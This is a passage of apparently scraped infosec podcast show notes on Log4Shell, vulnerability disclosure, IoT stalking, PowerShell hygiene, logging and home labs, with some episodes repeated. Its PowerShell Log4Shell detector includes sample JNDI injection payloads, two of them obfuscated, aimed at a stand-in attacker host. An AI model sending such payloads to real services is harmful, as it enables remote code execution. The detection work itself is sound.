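        $s = [regex]::Replace($s, '\$\{(?:lower|upper):([^{}$]*)\}', '$1', 'IgnoreCase')
        # ${anything:-X} (default-value syntax) collapses to X, e.g. ${::-j} or ${env:NOPE:-j}
        $s = [regex]::Replace($s, '\$\{[^{}$]*:-([^{}$]*)\}', '$1')
        if ($s -eq $before) { break }   # nothing left to unwrap
    }
    return $s
}

function Test-Log4ShellLookup {
    param([Parameter(Mandatory)][string]$Line)
    $normalized = Convert-Log4jLookup -Text $Line
    # Schemes the JNDI lookup will actually dereference (ldap/ldaps/rmi/dns/iiop/corba/nds)
    return $normalized -match '(?i)\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds)\s*:'
}

function Find-Log4ShellInLines {
    param([Parameter(Mandatory)][string[]]$Lines)
    foreach ($line in $Lines) {
        if (Test-Log4ShellLookup -Line $line) {
            [pscustomobject]@{ Normalized = Convert-Log4jLookup -Text $line; Line = $line }
        }
    }
}

# Constructed sample lines (not real traffic): a plain payload, two evasions, a benign
# date lookup that must not fire, and an ordinary request.
$sample = @(
    '10.0.0.5 - - [12/Dec/2021:10:01:02] "GET /login HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [12/Dec/2021:10:01:05] "GET /login HTTP/1.1" 200 "-" "${${lower:j}ndi:${::-l}dap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [12/Dec/2021:10:01:09] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%2Fo%7D HTTP/1.1" 400 "-" "curl/7.79"',
    'INFO  app - template rendered ${date:yyyy-MM-dd} for user bob',
    '10.0.0.6 - - [12/Dec/2021:10:02:00] "GET /healthz HTTP/1.1" 200 "-" "Mozilla/5.0"'
)

# The first three lines are reported; the last two are not.
Find-Log4ShellInLines -Lines $sample | Format-Table -AutoSize
```

Against a real file: `Find-Log4ShellInLines -Lines (Get-Content .\access.log)`. Treat a hit as a tripwire, not proof of compromise; the higher-fidelity signal is the one the egress discussion above is about, namely the application host making an outbound LDAP or RMI connection right after the request, and that is also what a JNDI-disabled build never does.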
https://github.com/MarkBaggett/srum-dump
“SRUM Dump extracts information from the System Resource Utilization Management Database and creates an Excel spreadsheet.
The SRUM is one of the best sources for applications that have run on your system in the last 30 days and is invaluable to your incident investigations!
To use the tool you will need a copy of the SRUM (located in c:\windows\system32\sru\srudb.dat, but locked by the OS).
This tool also requires a SRUM_TEMPLATE that defines table and field names. You can optionally provide the SOFTWARE registry hive and the tool will tell you which wireless networks were in use by applications.
If you are looking for a version of this tool that creates CSV files instead of an Excel spreadsheet, dumps targeted tables or processes any ese then check out ese2csv. ese2csv.exe is designed specifically for csv files with the CLI user in mind.”
Published on: December 23, 2021
Introduction
Overview of Log4j vuln (as of 16 December 2021)
Why is it a big deal? (impact/criticality/risk)
Talk about patching vs. mitigation
Why wasn’t this given the same visibility in 2009? Because it’s Oracle or Java?
Good callout is building slides to brief org leadership, detections, and other educational tools.
Vuln fatigue (Java vulns in 2009 and pretty much forever cause us fatigue)
Are there other technologies like log4j that prop up the entire world, and we just don’t know?
Egress traffic (discussed at length on Twitter; what problems does restricting it solve?)
https://twitter.com/mubix/status/1470430085169745920
Latest: https://www.theregister.com/2021/12/14/apache_log4j_v2_16_jndi_disabled_default/ - Apache disabled JNDI lookups by default in Log4j 2.16.0
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/ <- great aggregation
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-313
Lots of discussion about “SBOM solving the issue”. @K8em0 weighs in https://twitter.com/k8em0/status/1469437490691932164
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 - list of advisories for log4j
Mitigation: https://twitter.com/brunoborges/status/1469186875608875011
https://twitter.com/DannyThomas/status/1469709039911129088 (holy hell, 2009?!?)
2009 in fact, #CVE-2009-1094, then a bypass was fixed in CVE-2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834. That's when the JDK was fully protected, but other implementations remained vulnerable
https://bugzilla.redhat.com/show_bug.cgi?id=1639834
OpenJDK…
https://twitter.com/ThinkstCanary/status/1469439743905697797?s=20
You can use a point & click canarytoken from https://canarytokens.org to help test for the #log4j / #Log4Shell issue.
1) visit https://canarytokens.org;
2) choose the Log4shell token;
3) enter the email address you wish to be notified at;
4) copy/use the returned string...
Discussed in 2016 at Blackhat: https://twitter.com/th3_protoCOL/status/1469644923028656130
The #Log4Shell attack vector was known since 2016…
https://twitter.com/bettersafetynet/status/1469470284977745932
Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread.
When dealing with attacks like this you should remember the acronym IMMA.
I = Isolate
M = Minimize
M = Monitor
A = Active Defense
https://github.com/MarkBaggett/srum-dump
“SRUM Dump extracts information from the System Resource Utilization Management Database and creates an Excel spreadsheet.
The SRUM is one of the best sources for applications that have run on your system in the last 30 days and is invaluable to your incident investigations!
To use the tool you will need a copy of the SRUM (located in c:\windows\system32\sru\srudb.dat, but locked by the OS).
This tool also requires a SRUM_TEMPLATE that defines table and field names. You can optionally provide the SOFTWARE registry hive and the tool will tell you which wireless networks were in use by applications.
If you are looking for a version of this tool that creates CSV files instead of an Excel spreadsheet, dumps targeted tables or processes any ese then check out ese2csv. ese2csv.exe is designed specifically for csv files with the CLI user in mind.”
Published on: December 16, 2021
New $3 patron! 🎉 Thank you John K.!
https://www.stalkingawareness.org/wp-content/uploads/2019/01/SPARC_StalkngFactSheet_2018_FINAL.pdf
STALKING VICTIMIZATION
An estimated 6-7.5 million people are #stalked in a one year period in the United States.
Nearly 1 in 6 women and 1 in 17 men have experienced stalking victimization at some point in their lifetime.
Using a less conservative definition of stalking, which considers any amount of fear (i.e., a little fearful, somewhat fearful, or very fearful), 1 in 4 women and 1 in 13 men reported being a victim of stalking in their lifetime.
About half of all victims of stalking indicated that they were stalked before the age of 25.
Stalkers use many tactics including:
Approaching the victim or showing up in places when the victim didn’t want them to be there;
making unwanted telephone calls; leaving the victim unwanted messages (text or voice);
watching or following the victim from a distance
spying on the victim with a listening device, camera, or #GPS. (or #IOT device)
https://www.vice.com/en/article/d3akpk/smart-home-technology-stalking-harassment
https://www.ucl.ac.uk/steapp/sites/steapp/files/giot-report.pdf - Tech Abuse Gender and IoT Research Report
https://www.researchgate.net/publication/260867980_TRAPPED_TECHNOLOGY_AS_A_BARRIER_TO_LEAVING_AN_ABUSIVE_RELATIONSHIP
Center to End Technical #Abuse (CETA) https://www.ceta.tech.cornell.edu/resources
https://82beb9a6-b7db-490a-88be-9f149bafe221.filesusr.com/ugd/c4e6d5_20fe31daffd74b2fb4b4735d703dad6a.pdf - disconnect checklist
TW (trigger warning): stalking resulting in death:
A pattern of fixation and obsession’: How the #pandemic exacerbated stalking cases in the UK
https://www.independent.co.uk/life-style/women/stalking-cases-pandemic-gracie-spinks-b1956589.html
https://pathwaystosafety.org/staying-safe/
https://www.techsafety.org/
https://static1.squarespace.com/static/51dc541ce4b03ebab8c5c88c/t/61674c082419497a370af990/1634159630368/2021_T2E+Needs+Assessment+Report.pdf
“Smart” or connected devices often referred to as the Internet of Things (IoT) turn up in cases “all the time” or “often” for a third of advocates and 1 in 5 #legal systems professionals. While this is rather low, people are increasingly using these types of technology. With additional use we may see increases in abuse through them. Additionally, advocates and legal systems professionals are often not aware of how these technologies can be misused, so they may not ask about them.
Published on: December 13, 2021
https://twitter.com/Esquiring - Fred Jennings
Vulnerabilities Equities Process (VEP), vulnerability disclosure program (VDP), and what is the best way to disclose a 0day? (‘proper’ is different and dependent on context)
This show was inspired by this Tweet thread from @k8em0 and @_MG_
https://twitter.com/k8em0/status/1459715464691535877
https://twitter.com/_MG_/status/1459718518346174465
Legal Safe Harbor? Copy-left for security researchers…?
What is a VEP? Not a new concept (2014)
Context: Was written when Heartbleed came out.
About transparency, but within reason
From the blogpost:
“We have also established a disciplined, rigorous and high-level decision-making process for vulnerability disclosure. This interagency process helps ensure that all of the pros and cons are properly considered and weighed. While there are no hard and fast rules, here are a few things I want to know when an agency proposes temporarily withholding knowledge of a vulnerability:
How much is the vulnerable system used in the core internet infrastructure, in other critical infrastructure systems, in the U.S. economy, and/or in national security systems?
Does the vulnerability, if left unpatched, impose significant risk?
How much harm could an adversary nation or criminal group do with knowledge of this vulnerability?
How likely is it that we would know if someone else was exploiting it?
How badly do we need the intelligence we think we can get from exploiting the vulnerability?
Are there other ways we can get it?
Could we utilize the vulnerability for a short period of time before we disclose it?
How likely is it that someone else will discover the vulnerability?
Can the vulnerability be patched or otherwise mitigated?”
Gov orgs involved in VEP: https://en.wikipedia.org/wiki/Vulnerabilities_Equities_Process
Assessing the Vulnerabilities Equities Process, Three Years After the VEP Charter
Companies have a VEP too (every time they issue a patch), but they aren’t always transparent about it. Embargoes aplenty. https://www.redhat.com/en/blog/security-embargoes-red-hat
https://xenproject.org/developers/security-policy/ (creates a caste system of ‘haves and not-haves’... important vs. not important) bad guys will target people not on the inside.
0day benefit from non-transparent VEP. https://www.randori.com/blog/why-zero-days-are-essential-to-security/
Randori had 365day… https://twitter.com/_MG_/status/1459024603263557633
https://twitter.com/JimSycurity/status/1459152870490574854
Preferred patch 8.1.17, issued October 2020
VEP does not always have to be 0day… can be solutions to issues: https://www.techdirt.com/articles/20210922/17095747614/fbi-sat-ransomware-decryption-key-weeks-as-victims-lost-millions-dollars.shtml
“The FBI refrained for almost three weeks from helping to unlock the computers of hundreds of businesses and institutions hobbled by a major ransomware attack this summer, even though the bureau had secretly obtained the digital key needed to do so, according to several current and former U.S. officials.
The key was obtained through access to the servers of the Russia-based criminal gang behind the July attack. Deploying it immediately could have helped the victims, including schools and hospitals, avoid what analysts estimate was millions of dollars in recovery costs.”
In a perfect world, what does disclosure look like?
Communication (easy, secure, detailed… pick 1)
Separating wheat from chaff - ‘lol, i got root, pay me plz’
Fear of NDAs and gag clauses
Do people expect to be paid?
Setup of a ‘cheap’ program? What if you don’t have a budget to pay out (or more accurately, mgmt won’t pay out)? People won’t disclose? Should you pay? Use a 3rd party?
Published on: November 21, 2021
https://twitter.com/Esquiring - Fred Jennings
Vulnerabilities Equities Process (VEP), vulnerability disclosure program (VDP), and what is the best way to disclose a 0day? (‘proper’ is different and dependent on context)
This show was inspired by this Tweet thread from @k8em0 and @_MG_
https://twitter.com/k8em0/status/1459715464691535877
https://twitter.com/_MG_/status/1459718518346174465
Legal Safe Harbor? Copy-left for security researchers…?
What is a VEP? Not a new concept (2014)
Context: Was written when Heartbleed came out.
About transparency, but within reason
From the blogpost:
“We have also established a disciplined, rigorous and high-level decision-making process for vulnerability disclosure. This interagency process helps ensure that all of the pros and cons are properly considered and weighed. While there are no hard and fast rules, here are a few things I want to know when an agency proposes temporarily withholding knowledge of a vulnerability:
How much is the vulnerable system used in the core internet infrastructure, in other critical infrastructure systems, in the U.S. economy, and/or in national security systems?
Does the vulnerability, if left unpatched, impose significant risk?
How much harm could an adversary nation or criminal group do with knowledge of this vulnerability?
How likely is it that we would know if someone else was exploiting it?
How badly do we need the intelligence we think we can get from exploiting the vulnerability?
Are there other ways we can get it?
Could we utilize the vulnerability for a short period of time before we disclose it?
How likely is it that someone else will discover the vulnerability?
Can the vulnerability be patched or otherwise mitigated?”
Gov orgs involved in VEP: https://en.wikipedia.org/wiki/Vulnerabilities_Equities_Process
Assessing the Vulnerabilities Equities Process, Three Years After the VEP Charter
Companies have a VEP too (every time they issue a patch), but they aren’t always transparent about it. Embargoes aplenty. https://www.redhat.com/en/blog/security-embargoes-red-hat
https://xenproject.org/developers/security-policy/ (creates a caste system of ‘haves and not-haves’... important vs. not important) bad guys will target people not on the inside.
0day benefit from non-transparent VEP. https://www.randori.com/blog/why-zero-days-are-essential-to-security/
Randori had 365day… https://twitter.com/_MG_/status/1459024603263557633
https://twitter.com/JimSycurity/status/1459152870490574854
Preferred patch 8.1.17, issued October 2020
VEP does not always have to be 0day… can be solutions to issues: https://www.techdirt.com/articles/20210922/17095747614/fbi-sat-ransomware-decryption-key-weeks-as-victims-lost-millions-dollars.shtml
“The FBI refrained for almost three weeks from helping to unlock the computers of hundreds of businesses and institutions hobbled by a major ransomware attack this summer, even though the bureau had secretly obtained the digital key needed to do so, according to several current and former U.S. officials.
The key was obtained through access to the servers of the Russia-based criminal gang behind the July attack. Deploying it immediately could have helped the victims, including schools and hospitals, avoid what analysts estimate was millions of dollars in recovery costs.”
In a perfect world, what does disclosure look like?
Communication (easy, secure, detailed… pick 1)
Separating wheat from chaff - ‘lol, i got root, pay me plz’
Fear of NDAs and gag clauses
Do people expect to be paid?
Setup of a ‘cheap’ program? What if you don’t have a budget to pay out (or more accurately, mgmt won’t pay out)? People won’t disclose? Should you pay? Use a 3rd party?
Published on: November 21, 2021
In this sponsored BDS episode, Bryan Brake and Amanda Berlin interview Emily Eubanks, a Security Operations Analyst for #Blumira. We discuss common business risks like IT staff turnover, a lack of Incident Response procedures, choosing not to follow PowerShell best practices, and MFA use for critical or sensitive applications. We also discuss ways to improve security posture to mitigate these risks as well as how Blumira can help organizations in light of these common business challenges.
ADDITIONAL RESOURCES
OUR REDDIT AMA
https://www.reddit.com/r/cybersecurity/comments/qao73j/we_are_a_security_team_with_20_years_of_ethical/
MFA
https://attack.mitre.org/mitigations/M1032/
https://techcommunity.microsoft.com/t5/azure-active-directory-identity/your-pa-word-doesn-t-matter/ba-p/731984
https://www.yubico.com/blog/otp-vs-u2f-strong-to-stronger/
INCIDENT RESPONSE
https://www.nist.gov/cyberframework/respond
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
POWERSHELL BEST PRACTICES
https://www.blumira.com/analysis-of-a-threat-powershell-malicious-activity/
https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/learn-script-security
https://devblogs.microsoft.com/powershell/secrets-management-module-vault-extensions/
https://www.reddit.com/r/PowerShell/comments/g3b9h5/how_are_you_managing_secrets/
MFA
RISK: A lack of MFA where available, or using SMS-based MFA for critical applications.
MITIGATION:
Please do not use SMS-based MFA for critical applications. [6] [7]
MFA is an easy layer of defense that has historically been very effective. [5]
One-Time Passwords (OTP) are good, but FIDO U2F is better. [8]
Consider hardware tokens (e.g. Yubico YubiKey, Google Titan Security Key).
BLUMIRA HELPS:
Blumira requires use of MFA.
MFA-related detections (e.g. AWS, Duo).
Incident Response Procedures
RISK: A lack of Incident Response procedures, or the decision to postpone them because they would disrupt service, typically results in unfavorable outcomes.
MITIGATION:
A written plan that identifies the roles, responsibilities, and procedures that should be set in motion once an incident has been declared.
If this is overwhelming to conceptualize, know that there are a good number of free and openly available resources to help with creating new IR plans. I highly recommend looking at the NIST documentation to get an idea of what is possible and then scaling to what is appropriate for your organization. [4]
The plan should be reviewed at a minimum once annually with everyone who is responsible for responding to incidents present. If anybody is unclear on their role, responsibilities or procedures, the Incident Response lead should work with them to get them there.
Incident Response procedures should be like a fire drill, so that when there is a real fire the team can work together to quickly put it out and minimize impact to the company and its customers. (Shoutout to the BDS podcast on drawing connections from fire fighting to Incident Response procedures with Dr. Catherine J. Ullman (@investigatorchi))
BLUMIRA HELPS:
Workflows: Blumira provides built-in guidance with workflows. Workflows ask direct questions and provide specific options to record responses to security findings, guiding practitioners towards a conclusion.
Finding analysis: provides additional details to help operators make informed decisions in response to new findings.
Recent or Frequent IT Staff Turnover
RISK: Impedes troubleshooting of log flow and/or investigations due to a lack of familiarity with the network environment.
MITIGATION:
Prevention might be the best solution. Giving your workers time during the work week to improve a work-related skill can help identify when a team is reaching or exceeding its resource capacity. If your team is overworked they are more likely to make mistakes, will be less prepared to go the extra mile when it is needed because they’ll already be tapped out of energy, and may be more likely to consider opportunities elsewhere.
You want to limit keystone employees, meaning that if an employee leaves for whatever reason you do not want that employee’s absence to cause a breakdown in processes for others. Redundancy is best here in most cases, IMO.
BLUMIRA HELPS:
Blumira works hard to create fewer, more actionable findings.
We strive to keep our alerts simple, providing the information that operators need to make informed decisions.
We try to focus on findings that require action, and provide workflows with additional guidance on what to investigate next to evaluate the impact of a security event.
PowerShell Scripting Best Practices
RISK:
Detections will be less helpful if staff are frequently dismissing events in response to approved administrative behavior like maintenance scripts.
Follow the PowerShell recommendations shared by Microsoft [1] including:
Sign your scripts (lol Microsoft has this bolded by the way hint hint wink wink): “another method for keeping scripts secure is vetting and signing your scripts”
Do not store secrets in PoSH scripts; if you are doing this you’re gonna want to google “secrets management” [2] and learn more about how to securely store and access secrets across an enterprise environment.
Briefly, there is a PowerShell module for vault secret extensions [3]; some vault extensions include KeePass, LastPass, HashiCorp Vault, Azure Key Vault, KeyChain, and CredMan.
Use a recent version of PowerShell (we are on version 7, but this article recommends 5+).
Enable and collect PowerShell logs.
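Added example of a maintenance script that follows the four recommendations above (recent PowerShell, no embedded secrets, a signed script, logging turned on). It is not code from the show notes, Blumira or Microsoft. The vault name LocalStore, the secret name svc-backup-token, the svc-backup account, the upload URL and the log folder are constructed placeholders; the SecretManagement cmdlets, the Authenticode cmdlets and the ScriptBlockLogging policy key are the real ones, and the timestamp server is an assumed public one.

```powershell
#Requires -Version 5.1
<#
  Invoke-NightlyBackup.ps1 -- added example, not from the show notes, Blumira or Microsoft.
  Shows: recent PowerShell check, no secrets in the script body, a signed script that
  verifies its own signature, and a check that script block logging is enabled.
  Assumptions (constructed placeholders): vault 'LocalStore', secret 'svc-backup-token',
  account 'svc-backup', upload URL https://backup.example.internal/upload.
#>
param(
    [string] $SourceDir = 'C:\ProgramData\App\logs',
    [string] $UploadUrl = 'https://backup.example.internal/upload'
)
Set-StrictMode -Version Latest
$ErrorActionPreference = 'Stop'

# --- 1. Recent PowerShell: warn loudly when running below the version the script was tested on.
if ($PSVersionTable.PSVersion.Major -lt 7) {
    Write-Warning "Tested on PowerShell 7+; running on $($PSVersionTable.PSVersion)"
}

# --- 2. Signed script: refuse to run if the Authenticode signature is missing or broken.
#     Sign once (admin, one-time):
#       $cert = Get-ChildItem Cert:\CurrentUser\My -CodeSigningCert | Select-Object -First 1
#       Set-AuthenticodeSignature -FilePath .\Invoke-NightlyBackup.ps1 -Certificate $cert `
#           -TimestampServer 'http://timestamp.digicert.com'   # assumed timestamp server
#     With Set-ExecutionPolicy AllSigned the engine enforces this as well; the self-check
#     makes a tampered or unsigned copy fail explicitly in the job output.
function Test-OwnSignature {
    $sig = Get-AuthenticodeSignature -FilePath $PSCommandPath
    return ($sig.Status -eq 'Valid')
}
if (-not (Test-OwnSignature)) {
    throw "Signature check failed for $PSCommandPath; the script was modified after signing or never signed."
}

# --- 3. No secrets in the script: pull the upload token from a SecretManagement vault.
#     One-time setup by an admin (not part of the scheduled job):
#       Install-Module Microsoft.PowerShell.SecretManagement, Microsoft.PowerShell.SecretStore
#       Register-SecretVault -Name LocalStore -ModuleName Microsoft.PowerShell.SecretStore -DefaultVault
#       Set-Secret -Name 'svc-backup-token' -Secret (Read-Host -AsSecureString 'token')
Import-Module Microsoft.PowerShell.SecretManagement
$token = Get-Secret -Name 'svc-backup-token' -Vault 'LocalStore'   # SecureString; never echoed or written to disk
$cred  = [pscredential]::new('svc-backup', $token)

# --- 4. Logging: confirm script block logging is on, so this job's 4104 events reach the SIEM
#     and the SOC can recognise the signed, named script instead of dismissing generic PowerShell alerts.
#     Enable via policy (admin, one-time):
#       $k = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
#       New-Item -Path $k -Force | Out-Null
#       Set-ItemProperty -Path $k -Name EnableScriptBlockLogging -Value 1 -Type DWord
function Test-ScriptBlockLogging {
    $k = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $p = Get-ItemProperty -Path $k -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
    return ($null -ne $p -and $p.EnableScriptBlockLogging -eq 1)
}
if (-not (Test-ScriptBlockLogging)) {
    Write-Warning 'Script block logging is not enabled by policy; this run will not produce 4104 events.'
}

# --- The actual maintenance work: archive the application logs and upload them with the vault credential.
$stamp   = (Get-Date).ToString('yyyyMMdd')
$archive = Join-Path $env:TEMP "app-logs-$stamp.zip"
Compress-Archive -Path (Join-Path $SourceDir '*.log') -DestinationPath $archive -Force
Invoke-RestMethod -Uri $UploadUrl -Method Put -InFile $archive -Credential $cred | Out-Null
Remove-Item $archive -Force
Write-Output "Uploaded app-logs-$stamp.zip to $UploadUrl as $($cred.UserName)"
```

Because the script is signed and carries a stable file name, the script block events it generates (event ID 4104 in Microsoft-Windows-PowerShell/Operational) are easy to tell apart from ad hoc or obfuscated PowerShell, which is what keeps the approved maintenance run from training analysts to dismiss PowerShell findings.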
MITIGATION:
Blumira detects on malicious PowerShell usage.
BLUMIRA HELPS:
ADDITIONAL LINKS AND SOURCES:
[1] https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/learn-script-security
[2] https://www.reddit.com/r/PowerShell/comments/g3b9h5/how_are_you_managing_secrets/
[3] https://github.com/PowerShell/SecretManagement
[3] https://devblogs.microsoft.com/powershell/secrets-management-module-vault-extensions/
[4] https://www.nist.gov/cyberframework/respond
[5] https://attack.mitre.org/mitigations/M1032/
[6] https://techcommunity.microsoft.com/t5/azure-active-directory-identity/your-pa-word-doesn-t-matter/ba-p/731984
[7] https://www.zdnet.com/article/microsoft-urges-users-to-stop-using-phone-based-multi-factor-authentication/
[8] https://www.yubico.com/blog/otp-vs-u2f-strong-to-stronger/
https://www.blumira.com/analysis-of-a-threat-powershell-malicious-activity/
https://securityaffairs.co/wordpress/124570/cyber-crime/fbi-hacked-email-server.html
https://www.randori.com/blog/why-zero-days-are-essential-to-security/
https://twitter.com/_MG_/status/1459024603263557633
“Hey... did anyone notice that PAN 0day was fixed in a version that was released over a year ago?
Guess it wasn't easy to notice under all the loud opinions about ethics.”
https://twitter.com/_MG_/status/1459038747807285253/photo/1
Published on: November 16, 2021
News stories covered this week, as well as links of note:
https://www.wired.co.uk/article/sweden-stockholm-school-app-open-source
https://curtbraz.medium.com/a-konami-code-for-vuln-chaining-combos-1a29d0a27c2a
https://docs.google.com/presentation/d/17gISafUZzEyjV7wkdHaTQZmtxstBqECa/edit#slide=id.p4
https://www.securityweek.com/braktooth-new-bluetooth-vulnerabilities-could-affect-millions-devices
https://offsec.almond.consulting/intro-to-file-operation-abuse-on-Windows.html
https://cyber.dhs.gov/bod/22-01/
https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Published on: November 8, 2021
https://security.googleblog.com/2021/10/launching-collaborative-minimum.html
https://mvsp.dev/mvsp.en/index.html
https://www.standardfusion.com/blog/assessing-vendor-risk-with-questionnaires/
From Nato’s email:
Hi Bryan,
Discussing the challenges that come with not having good logging in place could be a great topic! We could make it partly about how security maturity works, in the idea that security generally starts with awareness and visibility.
The topic sort of gets into the idea that knowing is half the battle, so logging can be transformative for helping a company properly secure themselves from online risks!
What do you think of this topic idea?
https://www.blumira.com/careers/
https://thenewstack.io/logging-and-monitoring-why-you-need-both/
https://www.sentinelone.com/blog/the-10-commandments-of-logging/
https://towardsdatascience.com/why-should-you-care-about-logging-442a195b80a1
https://www.g2.com/products/blumira-automated-detection-response/reviews#survey-response-4908309
(wouldn’t you know it… a couple additional google searches, and I find this -brbr)
https://www.executivegov.com/2021/08/omb-creates-maturity-framework-for-event-log-management/
https://insidecybersecurity.com/sites/insidecybersecurity.com/files/documents/2021/may/cs2021_0089c.pdf
Logging maturity in the US gov (OMB policy doc): https://www.whitehouse.gov/wp-content/uploads/2021/08/M-21-31-Improving-the-Federal-Governments-Investigative-and-Remediation-Capabilities-Related-to-Cybersecurity-Incidents.pdf
Are there examples of devices that don’t give out logs? What if your vendor does not allow you to have logs? Can you create logs based on the activity of the device? What would that look like?
Types of logs:
Application logs
Network logs
Endpoint security logs
OS logs
IDS/IPS logs
Vuln scanner logs
Published on: November 1, 2021
Blog post that inspired this episode:
https://lizsaling.com/SWE-team-five-pillars/
Liz Saling (@lizsaling)
https://www.mindtools.com/pages/article/newLDR_86.htm
http://www.mspguide.org/tool/tuckman-forming-norming-storming-performing
https://michaelhyatt.com/3-roadblocks-to-avoid-for-optimal-team-performance
Erin Meyer is the one who did the Netflix study!
https://bigthink.com/the-present/high-performing-teams/
https://alicedartnell.com/blog/why-smart-goals-are-stupid/
NEWS:
Unlocking ‘god’ mode on windows 11: https://www.bleepingcomputer.com/news/microsoft/how-to-unlock-windows-11s-god-mode-to-access-advanced-settings/
https://www.reddit.com/r/netsec/comments/q9f63y/creating_a_basic_python_reverse_shell_listener/
NFT malware (NFTs that empty wallets): https://www.theregister.com/2021/10/17/in_brief_security/
Published on: October 25, 2021
Tony Robinson (@da_667)
Thought we’d put in a little news to round out the show
https://www.bbc.com/news/world-us-canada-58863678 - nuclear secrets hidden in a peanut butter sandwich
https://www.theregister.com/2018/04/20/rsa_security_conference_insecure_mobile_app/
https://www.vice.com/en/article/jg8w9b/the-twitch-hack-is-worse-for-streamers-than-for-twitch
https://www.securityweek.com/fontonlake-linux-malware-used-targeted-attacks
Similar device on ebay: https://www.ebay.com/itm/324762812721
https://www.zdnet.com/article/brewdog-exposed-data-of-200000-shareholders-for-over-a-year/
https://tpetersonkth.github.io/cve/2021/10/02/Analysis-of-CVE-2019-9053.html
www.leanpub.com/avatar2 MSRP = $30 USD
Book changes
What is the end goal?
Upskill?
Independent consultant?
Promotion?
Bug bounties?
Lab setup -
Lab setup types
Cloud based -
Desktop/laptop/NUC -
Server -
Good VMs to
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ - 90 day Windows machines
What other home lab equipment would be helpful?
Testing IoT/embedded devices?
Car hacking?
Malware analysis?
https://bazaar.abuse.ch/
Virus Total Intelligence
Honeypots
@malware_traffic - https://twitter.com/malware_traffic/status/1446627364147023877
Analyzing binaries?
Patch analysis (patch tuesday, print nightmare, etc)?
https://wumb0.in/extracting-and-diffing-ms-patches-in-2020.html
https://www.netresec.com/?page=networkminer
Soldering?
Oscilloscopes for voltage checks?
Wireless?
Old cellphones (mobile apps, don’t need cellular)
Personal assistant devices (used IoT devices?)
Accessing data stored on devices
Specific software licenses?
Burp?
If I’m trying to break into infosec, how do I use my lab to sell myself to an employer?
Does the employer care?
How can someone show what they’ve learned in a way that shows the value?
Published on: October 17, 2021
Tony Robinson (@da_667)
Thought we’d put in a little news to round out the show
https://www.bbc.com/news/world-us-canada-58863678 - nuclear secrets hidden in a peanut butter sandwich
https://www.theregister.com/2018/04/20/rsa_security_conference_insecure_mobile_app/
https://www.vice.com/en/article/jg8w9b/the-twitch-hack-is-worse-for-streamers-than-for-twitch
https://www.securityweek.com/fontonlake-linux-malware-used-targeted-attacks
Similar device on ebay: https://www.ebay.com/itm/324762812721
https://www.zdnet.com/article/brewdog-exposed-data-of-200000-shareholders-for-over-a-year/
https://tpetersonkth.github.io/cve/2021/10/02/Analysis-of-CVE-2019-9053.html
www.leanpub.com/avatar2 MSRP = $30 USD
Book changes
What is the end goal?
Upskill?
Independent consultant?
Promotion?
Bug bounties?
Lab setup -
Lab setup types
Cloud based -
Desktop/laptop/NUC -
Server -
Good VMs to
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ - 90 day Windows machines
What other home lab equipment would be helpful?
Testing IoT/embedded devices?
Car hacking?
Malware analysis?
https://bazaar.abuse.ch/
Virus Total Intelligence
Honeypots
@malware_traffic - https://twitter.com/malware_traffic/status/1446627364147023877
Analyzing binaries?
Patch analysis (patch tuesday, print nightmare, etc)?
https://wumb0.in/extracting-and-diffing-ms-patches-in-2020.html
https://www.netresec.com/?page=networkminer
Soldering?
Oscilloscopes for voltage checks?
Wireless?
Old cellphones (mobile apps, don’t need cellular)
Personal assistant devices (used IoT devices?)
Accessing data stored on devices
Specific software licenses?
Burp?
If I’m trying to break into infosec, how do I use my lab to sell myself to an employer?
Does the employer care?
How can someone show what they’ve learned in a way that shows the value?
Published on: October 14, 2021
GRC tools (Governance Risk and Compliance)
@ki_twyce_
@TechSecChix
Infosec Unplugged
Security Happy Hour
Eric’s cyberpoppa show
Cyber Insight show - cohost
Blumira is hiring
https://www.blumira.com/careers/
https://www.cio.com/article/3206607/what-is-grc-and-why-do-you-need-it.html
https://www.oxial.com/all/how-to-go-about-choosing-your-grc-solution/
Why do we need a GRC tool?
https://resilience.acoss.org.au/the-six-steps/managing-your-risks/risk-register
What are our business goals? (to make money... :D )
Are we mature enough to be measuring ourselves?
How can we use this to be more efficient?
https://www.standardfusion.com/blog/the-future-of-grc-7-things-to-look-out-for/
GRC tool use in other areas
IT - makes more informed budget decisions, determines directions in business goals, asset mgmt
Finance - Make better financial decisions, profitability
Infosec - vuln mgmt
Compliance
HR - determine hiring requirements
Legal - ensures ethical management of the organization, reduces breaches
How do you implement GRC?
https://www.crowe.com/insights/6-steps-for-a-successful-grc-implementation
Published on: September 29, 2021
GRC tools (Governance Risk and Compliance)
@ki_twyce_
@TechSecChix
Infosec Unplugged
Security Happy Hour
Eric’s cyberpoppa show
Cyber Insight show - cohost
Blumira is hiring
https://www.blumira.com/careers/
https://www.cio.com/article/3206607/what-is-grc-and-why-do-you-need-it.html
https://www.oxial.com/all/how-to-go-about-choosing-your-grc-solution/
Why do we need a GRC tool?
https://resilience.acoss.org.au/the-six-steps/managing-your-risks/risk-register
What are our business goals? (to make money... :D )
Are we mature enough to be measuring ourselves?
How can we use this to be more efficient?
https://www.standardfusion.com/blog/the-future-of-grc-7-things-to-look-out-for/
GRC tool use in other areas
IT - makes more informed budget decisions, determines directions in business goals, asset mgmt
Finance - Make better financial decisions, profitability
